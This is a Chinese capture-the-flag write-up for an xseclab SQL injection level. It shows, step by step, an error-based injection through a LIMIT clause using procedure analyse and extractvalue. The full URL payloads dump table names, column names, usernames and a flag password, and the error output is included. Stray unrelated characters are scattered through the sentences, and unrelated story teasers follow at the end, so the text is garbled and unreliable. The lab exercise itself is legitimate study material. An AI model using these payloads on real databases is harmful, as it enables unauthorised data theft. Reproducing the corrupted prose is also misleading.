網(wǎng)絡(luò)信息安全攻防學(xué)習(xí)平臺(tái) 注入關(guān)第四

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1

鏈接點(diǎn)進(jìn)去,發(fā)現(xiàn)

Today

I meet a girl

然后F12 啥也沒(méi)有脆贵,可是url里面有兩個(gè)參數(shù):start=0&num=1

然后多次嘗試更改start&num 參數(shù)值

發(fā)現(xiàn)一個(gè)奇妙的事情:

更改start的參數(shù)值可以顯示不同內(nèi)容来颤,而num不可以


在輸入了'and 1=1 后的樣子

這是一道limit的題,比以往遇到的有點(diǎn)不一樣,真是一關(guān)比一關(guān)難啊议街。

那么我們先放上來(lái)一篇文章給大家看看

http://www.freebuf.com/articles/web/57528.html

select field from user where id=XXX order by id limit 1,1 procedure analyse (extractvalue(rand(),concat(0x3a,SQL注入代碼)),1);

這是limit注入的樣栗

procedure analyse 通過(guò)分析select查詢結(jié)果對(duì)現(xiàn)有的表的每一列給出優(yōu)化的建議

extractvalue 冤留,? ? EXTRACTVALUE (XML_document, XPath_string); 從目標(biāo)XML中返回包含所查詢值的字符串

rand(), 返回一個(gè)介于 0 到 1(不包括 0 和 1)之間的偽隨機(jī) float 值。

concat 倡鲸, 返回結(jié)果為連接參數(shù)產(chǎn)生的字符串供嚎。如有任何一個(gè)參數(shù)為NULL ,則返回值為 NULL

這里利用的是報(bào)錯(cuò)注入法,而且跟XPATH有關(guān)查坪,至于具體內(nèi)容大家可以自行搜一下

那么我們?cè)谳斎隨QL注入代碼的地方開始正常搭建注入

procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23&num=1

出現(xiàn)了報(bào)錯(cuò)提示寸宏,但是已經(jīng)出來(lái)了結(jié)果

XPATH syntax error: 'article,user'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

那么我們繼續(xù)在user中爆列名,article也是一樣的偿曙。

別忘了氮凝,表名要16進(jìn)制轉(zhuǎn)碼

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23&num=1 %23

懶得截圖了

XPATH syntax error: ': id,username.password,lastloginI'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

出現(xiàn)了:id,username.password,lastloginI

繼續(xù)查詢username表

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username) from user))),1)%23&num=1 %23

結(jié)果就出來(lái)了

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6 procedure analyse(extractvalue(rand(),concat(0x3a,(select password from user where username=0x666c6167))),1)%23&num=1 %23

flag? ? ?myflagishere

這道題好難啊

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市望忆,隨后出現(xiàn)的幾起案子罩阵,更是在濱河造成了極大的恐慌,老刑警劉巖启摄,帶你破解...
    沈念sama閱讀 219,110評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件稿壁,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡歉备,警方通過(guò)查閱死者的電腦和手機(jī)傅是,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,443評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)蕾羊,“玉大人喧笔,你說(shuō)我怎么就攤上這事」暝伲” “怎么了书闸?”我有些...
    開封第一講書人閱讀 165,474評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)利凑。 經(jīng)常有香客問(wèn)我浆劲,道長(zhǎng),這世上最難降的妖魔是什么哀澈? 我笑而不...
    開封第一講書人閱讀 58,881評(píng)論 1 295
  • 正文 為了忘掉前任牌借,我火速辦了婚禮,結(jié)果婚禮上日丹,老公的妹妹穿的比我還像新娘走哺。我一直安慰自己,他們只是感情好哲虾,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,902評(píng)論 6 392
  • 文/花漫 我一把揭開白布丙躏。 她就那樣靜靜地躺著,像睡著了一般束凑。 火紅的嫁衣襯著肌膚如雪晒旅。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,698評(píng)論 1 305
  • 那天汪诉,我揣著相機(jī)與錄音废恋,去河邊找鬼谈秫。 笑死,一個(gè)胖子當(dāng)著我的面吹牛鱼鼓,可吹牛的內(nèi)容都是我干的拟烫。 我是一名探鬼主播,決...
    沈念sama閱讀 40,418評(píng)論 3 419
  • 文/蒼蘭香墨 我猛地睜開眼迄本,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼硕淑!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起嘉赎,我...
    開封第一講書人閱讀 39,332評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤置媳,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后公条,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體拇囊,經(jīng)...
    沈念sama閱讀 45,796評(píng)論 1 316
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,968評(píng)論 3 337
  • 正文 我和宋清朗相戀三年靶橱,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了寥袭。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,110評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡抓韩,死狀恐怖纠永,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情谒拴,我是刑警寧澤,帶...
    沈念sama閱讀 35,792評(píng)論 5 346
  • 正文 年R本政府宣布涉波,位于F島的核電站英上,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏啤覆。R本人自食惡果不足惜苍日,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,455評(píng)論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望窗声。 院中可真熱鬧相恃,春花似錦、人聲如沸笨觅。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,003評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)见剩。三九已至杀糯,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間苍苞,已是汗流浹背固翰。 一陣腳步聲響...
    開封第一講書人閱讀 33,130評(píng)論 1 272
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人骂际。 一個(gè)月前我還...
    沈念sama閱讀 48,348評(píng)論 3 373
  • 正文 我出身青樓疗琉,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親歉铝。 傳聞我的和親對(duì)象是個(gè)殘疾皇子盈简,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,047評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容